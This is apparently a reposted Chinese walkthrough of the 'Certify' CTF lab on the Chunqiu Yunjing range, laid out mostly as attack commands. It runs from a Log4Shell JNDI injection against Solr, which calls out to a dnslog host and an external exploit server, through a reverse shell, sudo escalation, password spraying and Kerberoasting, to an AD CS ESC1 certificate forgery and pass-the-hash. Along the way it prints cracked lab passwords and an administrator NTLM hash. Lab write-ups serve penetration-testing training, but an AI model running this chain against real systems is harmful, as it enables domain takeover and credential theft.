【内网渗透】最保姆级的春秋云镜Certify打靶笔记

news2024/11/15 14:22:07

flag1

flag2

flag3

flag4

flag1

fscan扫外网

访问8983端口，发现配置项有log4j

【vulhub】Log4j2：CVE-2021-44228漏洞复现_vulhub cve-2021-44228-CSDN博客

/solr/admin/collections?action=${jndi:ldap://z5o5w8.dnslog.cn}

dnslog测出可以打jndi

java -jar JNDIExploit.jar -i 124.222.136.33

反弹shell，sudo grc提权

flag2

切到/tmp目录wget下载fscan和frp，搭代理，扫内网

172.22.9.7 XIAORANG-DC

172.22.9.19 已拿下

172.22.9.26 DESKTOP-CBKTVMO

172.22.9.47 fileserver

fileserver可以smbclient直连上去

proxychains4 impacket-smbclient 172.22.9.47

拿到personnel.db和flag02.txt

flag3

用navicat打开personnel.db文件

一张导出为username.txt

一张导出为password.txt

处理一下导出文件内容的双引号

import sys

# 检查是否提供了文件名参数
if len(sys.argv) != 2:
    print("Usage: python eraser.py <filename>")
    sys.exit(1)

# 获取命令行参数中的文件名
filename = sys.argv[1]

# 读取文件内容
with open(filename, 'r', encoding='utf-8') as file:
    content = file.read()

# 删除所有双引号
content = content.replace('"', '')

# 将处理后的内容写回原文件
with open(filename, 'w', encoding='utf-8') as file:
    file.write(content)

print(f"所有双引号已删除，并将结果保存回 {filename}")

密码喷洒一下

proxychains4 crackmapexec smb 172.22.9.26 -u username.txt -p password.txt --continue-on-success

爆出来两个

xiaorang.lab\zhangjian:i9XDE02pLVf
xiaorang.lab\liupeng:fiAzGwEMgTY

两个rdp都失败了，flag2提示打SPN

proxychains4 impacket-GetUserSPNs -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf
proxychains4 impacket-GetUserSPNs -request -dc-ip 172.22.9.7 xiaorang.lab/liupeng:fiAzGwEMgTY

得到zhangxia和chenchen的密码哈希，分别hashcat爆一下

hashcat -a 0 -m 13100 hash.txt ./rockyou.txt

xiaorang.lab\zhangxia MyPass2@@6
xiaorang.lab\chenchen @Passw0rd@

再rdp连上去，发现什么都没有

查看证书情况

proxychains4 certipy-ad find -u 'zhangxia@xiaorang.lab'  -password 'MyPass2@@6' -dc-ip 172.22.9.7 -vulnerable -stdout

改一下/etc/hosts，避免超时

利用 ESC1

proxychains4 certipy-ad req -u 'zhangxia@xiaorang.lab' -p 'MyPass2@@6' -target 172.22.9.7 -dc-ip 172.22.9.7 -ca 'xiaorang-XIAORANG-DC-CA' -template 'XR Manager' -upn 'administrator@xiaorang.lab'

拿到生成的administrator.pfx获取域管哈希

proxychains4 certipy-ad auth -pfx administrator.pfx -dc-ip 172.22.9.7

pth拿域管

proxychains4 impacket-smbexec -hashes :2f1b57eefb2d152196836b0516abea80 xiaorang.lab/administrator@172.22.9.26

type c:\users\administrator\flag\flag03.txt

flag4

proxychains4 impacket-smbexec -hashes :2f1b57eefb2d152196836b0516abea80 xiaorang.lab/administrator@172.22.9.7

atype c:\users\administrator\flag\flag04.txt

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/2104889.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！